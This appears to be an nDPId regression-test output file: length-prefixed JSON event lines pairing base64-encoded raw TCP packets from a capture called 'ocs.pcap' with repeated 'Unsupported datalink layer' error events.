-00324{"packet_event_id":1,"packet_event_name":"packet","packet_id":657,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANML8QABABn\/twKi0ArL40DbC2QBQ64tGkd7x0rOAEC\/qqPoAAAEBCAoANZLLRwYlCw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":658,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652828075} -00324{"packet_event_id":1,"packet_event_name":"packet","packet_id":658,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANML9QABABn\/swKi0ArL40DbC2QBQ64tGkd7x2B+AEC\/qo40AAAEBCAoANZLMRwYlCw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":659,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652828078} -00324{"packet_event_id":1,"packet_event_name":"packet","packet_id":659,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANML+QABABn\/rwKi0ArL40DbC2QBQ64tGkd7x3YuAEC\/WnjMAAAEBCAoANZLMRwYlDQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":660,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652828080} -00325{"packet_event_id":1,"packet_event_name":"packet","packet_id":660,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANML\/QABABn\/qwKi0ArL40DbC2QBQ64tGkd7x4veAEC\/BmNwAAAEBCAoANZLMRwYlDQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":661,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652828158} -00324{"packet_event_id":1,"packet_event_name":"packet","packet_id":661,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMMAQABABn\/pwKi0ArL40DbC2QBQ64tGkd7x6GOAEC\/qkzMAAAEBCAoANZLURwYlGQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":662,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652828160} -00340{"packet_event_id":1,"packet_event_name":"packet","packet_id":662,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMMBQABABn\/cwKi0ArL40DbC2QBQ64tGkd7x6GOwEC\/qviwAAAEBCAoANZLURwYlGQEBBQre8e3P3vHzOw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":663,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652828184} -00349{"packet_event_id":1,"packet_event_name":"packet","packet_id":663,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMMCQABABn\/TwKi0ArL40DbC2QBQ64tGkd7x6GPQEC\/q6XkAAAEBCAoANZLXRwYlGQEBBRLe8fin3vH+E97x7c\/e8fM7"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":664,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652828185} -00349{"packet_event_id":1,"packet_event_name":"packet","packet_id":664,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMMDQABABn\/SwKi0ArL40DbC2QBQ64tGkd7x6GPQEC\/q5A0AAAEBCAoANZLXRwYlGQEBBRLe8fin3vIDf97x7c\/e8fM7"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":665,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652828187} -00349{"packet_event_id":1,"packet_event_name":"packet","packet_id":665,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMMEQABABn\/RwKi0ArL40DbC2QBQ64tGkd7x6GPQEC\/q3qEAAAEBCAoANZLXRwYlGQEBBRLe8fin3vII697x7c\/e8fM7"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":666,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652828208} -00340{"packet_event_id":1,"packet_event_name":"packet","packet_id":666,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMMFQABABn\/YwKi0ArL40DbC2QBQ64tGkd7x8zuwEC+\/ktcAAAEBCAoANZLZRwYlNAEBBQre8fin3vII6w=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":667,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652828215} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":667,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMMGQABABn\/jwKi0ArL40DbC2QBQ64tGkd7yCOuAEC+scscAAAEBCAoANZLaRwYlNQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":668,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652828217} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":668,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMMHQABABn\/iwKi0ArL40DbC2QBQ64tGkd7yDleAEC+XbXAAAAEBCAoANZLaRwYlNQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":669,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652828235} -00324{"packet_event_id":1,"packet_event_name":"packet","packet_id":669,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMMIQABABn\/hwKi0ArL40DbC2QBQ64tGkd7yE8OAEC\/qZ6oAAAEBCAoANZLcRwYlOg=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":670,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652828243} -00324{"packet_event_id":1,"packet_event_name":"packet","packet_id":670,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMMJQABABn\/gwKi0ArL40DbC2QBQ64tGkd7yGS+AEC\/WYlAAAAEBCAoANZLcRwYlPA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":671,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652828244} -00324{"packet_event_id":1,"packet_event_name":"packet","packet_id":671,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMMKQABABn\/fwKi0ArL40DbC2QBQ64tGkd7yHpuAEC\/BXPgAAAEBCAoANZLdRwYlPA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":672,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652828249} -00324{"packet_event_id":1,"packet_event_name":"packet","packet_id":672,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMMLQABABn\/ewKi0ArL40DbC2QBQ64tGkd7yJAeAEC\/qV2MAAAEBCAoANZLdRwYlPA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":673,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652828315} -00340{"packet_event_id":1,"packet_event_name":"packet","packet_id":673,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMMMQABABn\/RwKi0ArL40DbC2QBQ64tGkd7yJAewEC\/q9VwAAAEBCAoANZLkRwYlPAEBBQre8jRL3vI5tw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":674,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652828370} -00340{"packet_event_id":1,"packet_event_name":"packet","packet_id":674,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMMNQABABn\/QwKi0ArL40DbC2QBQ64tGkd7yKXOwEC\/q79IAAAEBCAoANZLpRwYlVQEBBQre8jRL3vI5tw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":675,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652828436} -00341{"packet_event_id":1,"packet_event_name":"packet","packet_id":675,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMMOQABABn\/PwKi0ArL40DbC2QBQ64tGkd7yKXOwEC\/q6l8AAAEBCAoANZLwRwYlVQEBBQre8jRL3vI\/Iw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":676,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652828815} -00341{"packet_event_id":1,"packet_event_name":"packet","packet_id":676,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMMPQABABn\/OwKi0ArL40DbC2QBQ64tGkd7yLt+wEC\/W5IMAAAEBCAoANZMWRwYlswEBBQre8jRL3vI\/Iw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":677,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652828881} -00350{"packet_event_id":1,"packet_event_name":"packet","packet_id":677,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMMQQABABn\/FwKi0ArL40DbC2QBQ64tGkd7yLt\/QEC\/Wd\/0AAAEBCAoANZMcRwYlswEBBRLe8kSP3vJJ+97yNEve8j8j"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":678,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652828882} -00349{"packet_event_id":1,"packet_event_name":"packet","packet_id":678,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMMRQABABn\/EwKi0ArL40DbC2QBQ64tGkd7yLt\/QEC\/WcpEAAAEBCAoANZMcRwYlswEBBRLe8kSP3vJPZ97yNEve8j8j"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":679,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652828940} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":679,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMMSQABABn\/LwKi0ArL40DbC2QBQ64tGkd7yPyOwEC+ss6YAAAEBCAoANZMiRwYl4gEBBQre8kSP3vJPZw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":680,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652828941} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":680,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMMTQABABn\/WwKi0ArL40DbC2QBQ64tGkd7yT2eAEC+XK2sAAAEBCAoANZMiRwYl4g=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":681,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652828942} -00340{"packet_event_id":1,"packet_event_name":"packet","packet_id":681,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMMUQABABn\/JwKi0ArL40DbC2QBQ64tGkd7yT2ewEC\/qnbgAAAEBCAoANZMiRwYl4gEBBQre8kn73vJPZw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":682,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652828944} -00324{"packet_event_id":1,"packet_event_name":"packet","packet_id":682,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMMVQABABn\/UwKi0ArL40DbC2QBQ64tGkd7yVNOAEC\/WJcAAAAEBCAoANZMiRwYl4g=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":683,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652828993} -00324{"packet_event_id":1,"packet_event_name":"packet","packet_id":683,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMMWQABABn\/TwKi0ArL40DbC2QBQ64tGkd7yWj+AEC\/qICwAAAEBCAoANZMnRwYl8Q=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":684,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652828994} -00324{"packet_event_id":1,"packet_event_name":"packet","packet_id":684,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMMXQABABn\/SwKi0ArL40DbC2QBQ64tGkd7yX6uAEC\/qGr8AAAEBCAoANZMoRwYl8Q=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":685,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652828995} -00324{"packet_event_id":1,"packet_event_name":"packet","packet_id":685,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMMYQABABn\/RwKi0ArL40DbC2QBQ64tGkd7yZReAEC\/WFWcAAAEBCAoANZMoRwYl8Q=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":686,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652828997} -00324{"packet_event_id":1,"packet_event_name":"packet","packet_id":686,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMMZQABABn\/QwKi0ArL40DbC2QBQ64tGkd7yaoOAEC\/BEBAAAAEBCAoANZMoRwYl8Q=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":687,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652829055} -00324{"packet_event_id":1,"packet_event_name":"packet","packet_id":687,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMMaQABABn\/PwKi0ArL40DbC2QBQ64tGkd7yb++AEC\/qCmYAAAEBCAoANZMuRwYmAA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":688,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652829056} -00324{"packet_event_id":1,"packet_event_name":"packet","packet_id":688,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMMbQABABn\/OwKi0ArL40DbC2QBQ64tGkd7ydVuAEC\/qBPoAAAEBCAoANZMuRwYmAA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":689,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652829060} -00325{"packet_event_id":1,"packet_event_name":"packet","packet_id":689,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMMcQABABn\/NwKi0ArL40DbC2QBQ64tGkd7yeseAEC\/q\/4sAAAEBCAoANZMuRwYmAg=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":690,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652829062} -00324{"packet_event_id":1,"packet_event_name":"packet","packet_id":690,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMMdQABABn\/MwKi0ArL40DbC2QBQ64tGkd7ygDOAEC\/W+jMAAAEBCAoANZMuRwYmAg=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":691,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652829106} -00324{"packet_event_id":1,"packet_event_name":"packet","packet_id":691,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMMeQABABn\/LwKi0ArL40DbC2QBQ64tGkd7yhZ+AEC\/q9J8AAAEBCAoANZMzRwYmEQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":692,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652829107} -00324{"packet_event_id":1,"packet_event_name":"packet","packet_id":692,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMMfQABABn\/KwKi0ArL40DbC2QBQ64tGkd7yiwuAEC\/q7zMAAAEBCAoANZMzRwYmEQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":693,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652829109} -00324{"packet_event_id":1,"packet_event_name":"packet","packet_id":693,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMMgQABABn\/JwKi0ArL40DbC2QBQ64tGkd7ykHeAEC\/W6dsAAAEBCAoANZMzRwYmEQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":694,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652829111} -00324{"packet_event_id":1,"packet_event_name":"packet","packet_id":694,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMMhQABABn\/IwKi0ArL40DbC2QBQ64tGkd7yleOAEC\/B5IQAAAEBCAoANZMzRwYmEQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":695,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652829207} -00324{"packet_event_id":1,"packet_event_name":"packet","packet_id":695,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMMiQABABn\/HwKi0ArL40DbC2QBQ64tGkd7ym0+AEC\/q3tgAAAEBCAoANZM9RwYmHg=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":696,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652829207} -00340{"packet_event_id":1,"packet_event_name":"packet","packet_id":696,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMMjQABABn+6wKi0ArL40DbC2QBQ64tGkd7ym0+wEC\/qo\/gAAAEBCAoANZM9RwYmHgEBBQre8qC73vKmJw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":697,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652829210} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":697,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMMkQABABn+5wKi0ArL40DbC2QBQ64tGkd7ym0+wEC\/qnowAAAEBCAoANZM9RwYmHgEBBQre8qC73vKrkw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":698,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652829236} -00349{"packet_event_id":1,"packet_event_name":"packet","packet_id":698,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMMlQABABn+wwKi0ArL40DbC2QBQ64tGkd7ym0\/QEC\/qWSgAAAEBCAoANZNARwYmHgEBBRLe8rD\/3vK2a97yoLve8quT"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":699,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652829238} -00349{"packet_event_id":1,"packet_event_name":"packet","packet_id":699,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMMmQABABn+vwKi0ArL40DbC2QBQ64tGkd7ym0\/QEC\/qU7wAAAEBCAoANZNARwYmHgEBBRLe8rD\/3vK7197yoLve8quT"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":700,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652829241} -00349{"packet_event_id":1,"packet_event_name":"packet","packet_id":700,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMMnQABABn+uwKi0ArL40DbC2QBQ64tGkd7ym0\/QEC\/qTlAAAAEBCAoANZNARwYmHgEBBRLe8rD\/3vLBQ97yoLve8quT"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":701,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652829267} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":701,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMMoQABABn+1wKi0ArL40DbC2QBQ64tGkd7yq5OwEC+paHEAAAEBCAoANZNDRwYmPAEBBQre8rD\/3vLBQw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":702,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652829319} -00324{"packet_event_id":1,"packet_event_name":"packet","packet_id":702,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMMpQABABn\/AwKi0ArL40DbC2QBQ64tGkd7ywUOAEC\/BuOMAAAEBCAoANZNIRwYmPQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":703,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652829320} -00324{"packet_event_id":1,"packet_event_name":"packet","packet_id":703,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMMqQABABn+\/wKi0ArL40DbC2QBQ64tGkd7yxq+AEC\/qs04AAAEBCAoANZNIRwYmPQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":704,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652829326} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":704,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMMrQABABn++wKi0ArL40DbC2QBQ64tGkd7yzBuAEC\/WrfAAAAEBCAoANZNJRwYmQg=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":705,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652829415} 